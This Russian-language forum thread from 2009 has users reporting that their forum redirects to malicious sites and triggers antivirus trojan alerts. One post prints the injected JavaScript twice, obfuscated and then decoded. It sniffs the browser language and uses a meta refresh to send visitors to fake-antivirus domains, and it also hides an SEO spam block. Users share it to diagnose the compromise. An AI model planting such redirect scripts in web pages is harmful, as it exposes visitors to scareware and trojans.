Просмотр полной версии : ВНИМАНИЕ! Админам и модераторам.
Обратите внимание на то что делается с форумом.
Похоже на то, что кто-то пробует отработать на нем технику фишинговых атак.
Уже несколько раз замечал такое, что когда отправляеш новое сообщение, оно норовит перейти на какой-то левый адрес.
У меня Опера, потому пару раз такой даже блокировался, с недвузначным замечанием, что идет попытка перейти на вредоносный сайт.
Прошу оперативно провести дератификацию сайта и форума.
Да кстати, у меня антивируска иногда вопит, вроде коней разных греческих ловит.
superregistr
22.07.2009, 14:06
Я надеюсь на антивирусник.
White Hawk
22.07.2009, 16:48
Тоько что АВАСТ выругался "Sign of "JS:FakeAV-W [Trj]" has been found in "h t t p://n e b o r i n . i n f o/?uid=12800" file."
\\ разрежение моё
У меня 1 раз случилось - то ли сегодня, то ли вчера
<div class='quotetop'>Цитата</div>
Тоько что АВАСТ выругался "Sign of "JS:FakeAV-W [Trj]" has been found in "h t t p://n e b o r i n . i n f o/?uid=12800" file."[/b]
Да. Такое чуство что где-то в движке форума прописался скрипт, который редиректит на такого типа сайтики.
Я антивирусом у себя прошерстил, никаких трояново вроде не нашел.
superregistr
23.07.2009, 08:40
Сейчас произошло то, о чем говорит Аку_Аку. Отправляю сообщение, ничего не отправляется и выхожу на главную страницу форума.
Теперь просто выдает сообщение: кэш не получил ответных данных.
Пока помогает быстрый ответ.
superregistr
23.07.2009, 12:27
Форум отказывается грузиться примерно с 11.55-12.15, короче через раз то грузится, то ошибки выдает!
White Hawk
24.07.2009, 01:48
<div class='quotetop'>Цитата(Zuzik * 23.7.2009, 11:39) 297075</div>
А у меня начальник на выходных загорел и теперь еще больше похож на говно...
[/b]
Да простит меня мой ХОРОШИЙ друг Зюзик, но его башкопипасту посвящаю:
"Скачал программу по очистке пыли с монитора, а она у меня просит отправить смс, и никак не закрывается. Что делать?" :)
Админы.
ВАС таки конкретно кто-то хакерит.
Вот только что у меня, при попытке обновить страницу поиска -- http://www.civfanatics.ru/forum/index.php?...amp;CODE=getnew (http://www.civfanatics.ru/forum/index.php?act=Search&CODE=getnew)
Начало вылазить вот такое.... (привожу потому, что а вдруг получится вычислить банальным поиском) вместо показа страницы новых тем.
<script type="text/javascript" language="javascript"> var smnk=new Date( ); smnk.setTime(smnk.getTime( )+014*074*074*01750); document.cookie="sessio\x6e\x69d=34\x39a9f01\x394; p\x61th=\x2f; e\x78pi\x72es\x3d"+smnk.toGMTString( ); var gxwhdd=new Array("\x68ttp://\x67\x6fp\x61rkscan\x2ecom\x2f?ui\x64=12\x3800","http://\x73\143\x61nonl\x69nedir\x65ct.\x63om/\x68iti\x6e.p\x68p?\x6can\x64=3\x30&a\x66f\x69d=\x318\x3801"); var wemzlao="\x63a,c\x6f\x2cda\x2cde,cy\x2cel,e\x6e.eo,\x65s,\x66i,f\x72,g\x61,i\x74,j\x61,\x6ai,\x6bn\x2cnl\x2cno\x2cpt\x2csv"; var ntsfayo=navigator.language || navigator.systemLanguage; var lang=ntsfayo.toLowerCase( ); lang=lang.substr(0,2); if (wemzlao.indexOf(lang)==-1){ksjhr( ); }else {var vehvfx=Math.floor(Math.random( )*gxwhdd.length); wewx(gxwhdd[vehvfx]); }function wewx(zxjiiha){document.writeln("\074\115\x45\x54A\x20\110\x54TP-E\x51UIV\x3d\047\x52e\x66re\x73h\047 CO\x4eT\x45NT\x3d\0470;\x20UR\x4c="+zxjiiha+"\x27>"); document.writeln("\074meta htt\x70-equiv\x3d\047\x70rag\x6da\047\040\x63on\x74en\x74=\x27no-\x63a\x63he\x27>"); document.writeln("\x3cmeta\x20\x6ea\x6d\145\x3d\047\x72o\x62ots\x27 co\x6ete\x6et=\x27no\x69nd\x65x\x2cno\x66o\x6clo\x77\047\076"); }function ksjhr( ){wewx("\x68ttp://s\x63\141\x6eonlin\x65dir\x65ct.\x63om/\x68iti\x6e.p\x68p?\x6can\x64=\x330&\x61f\x66id\x3d18\x3802"); } </script>
<script>document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><h1> Harry Potter and the Half-Blood Prince Harry Potter and the Half-Blood Prince (http://digg.com/movies/Download_Harry_Potter_and_the_Half_Blood_Prince_Movie_4)</h1>01bc93bf47db20ce84b77fda9bba756b
Можете сами оценить
что делает сей скрипт
<script type="text/javascript" language="javascript">
var smnk=new Date( );
smnk.setTime(smnk.getTime( )+014*074*074*01750);
document.cookie="sessionid=349a9f0194; path=/; expires="+smnk.toGMTString( );
var gxwhdd=new Array("http://goparkscan.com/?uid=12800","http://s\143anonlinedirect.com/hitin.php?land=30&affid=18801");
var wemzlao="ca,co,da,de,cy,el,en.eo,es,fi,fr,ga,it,ja,ji,kn,nl,no,pt,sv";
var ntsfayo=navigator.language || navigator.systemLanguage;
var lang=ntsfayo.toLowerCase( ); lang=lang.substr(0,2);
if (wemzlao.indexOf(lang)==-1){ksjhr( ); }else {var vehvfx=Math.floor(Math.random( )*gxwhdd.length); wewx(gxwhdd[vehvfx]); }
function wewx(zxjiiha){document.writeln("\074\115ETA HTTP-EQUIV=\047Refresh\047 CONTENT=\0470; URL="+zxjiiha+"'>");
document.writeln("\074meta http-equiv=\047pragma\047\040content='no-cache'>");
document.writeln("<meta nam\145=\047robots' content='noindex,nofollow\047\076"); }
function ksjhr( ){wewx("http://sc\141nonlinedirect.com/hitin.php?land=30&affid=18802"); }
</script>
<script>document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script>
<h1> Harry Potter and the Half-Blood Prince Harry Potter and the Half-Blood Prince (http://digg.com/movies/Download_Harry_Potter_and_the_Half_Blood_Prince_Movie_4)</h1>
01bc93bf47db20ce84b77fda9bba756b
Я убрал тот манглинг который он использует
Он подставляет страничку с которой происходит дальше редирект на указанные там в виде ссылок вредоносные сайты
UserCivAlex
02.08.2009, 15:29
Там что-то про гарри поттера говорится :)
<div class='quotetop'>Цитата</div>
Harry_Potter_and_the_Half_Blood_Prince[/b]
Мой любимый фильм.
UserCivAlex
02.08.2009, 21:07
<div class='quotetop'>Цитата</div>
Мой любимый фильм.[/b]
Опять юморист :biglol:
<div class='quotetop'>Цитата</div>
вдруг получится вычислить банальным поиском[/b]
это не форумский движок отдаёт, это сам сервер отдаёт
если запрашивать несуществующий файл (попробуй), то сервер отдаёт 404, НО ИНОГДА отдаёт "javascript" вместо 404
Что хотите делайте, только Гарри Поттера не трожьте :)
<div class='quotetop'>Цитата</div>
это не форумский движок отдаёт, это сам сервер отдаёт[/b]
Дык... все равно что-то делать нужно.
Это ведь не какой-то безобидный скриптик -- те ссылки что в нем на трояны указывают.
Можна же как-то связатся с админами сервера.
Не по теме обсуждаемого, но в соответствии с названием темы:
Пользователь: :censored:
Привык я, понимаешь, обращать внимание на список наших пользователей, у которых день рождения... :(
//Пущай празднует/ Громозека
Powered by vBulletin® Version 4.1.9 Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. Перевод: zCarot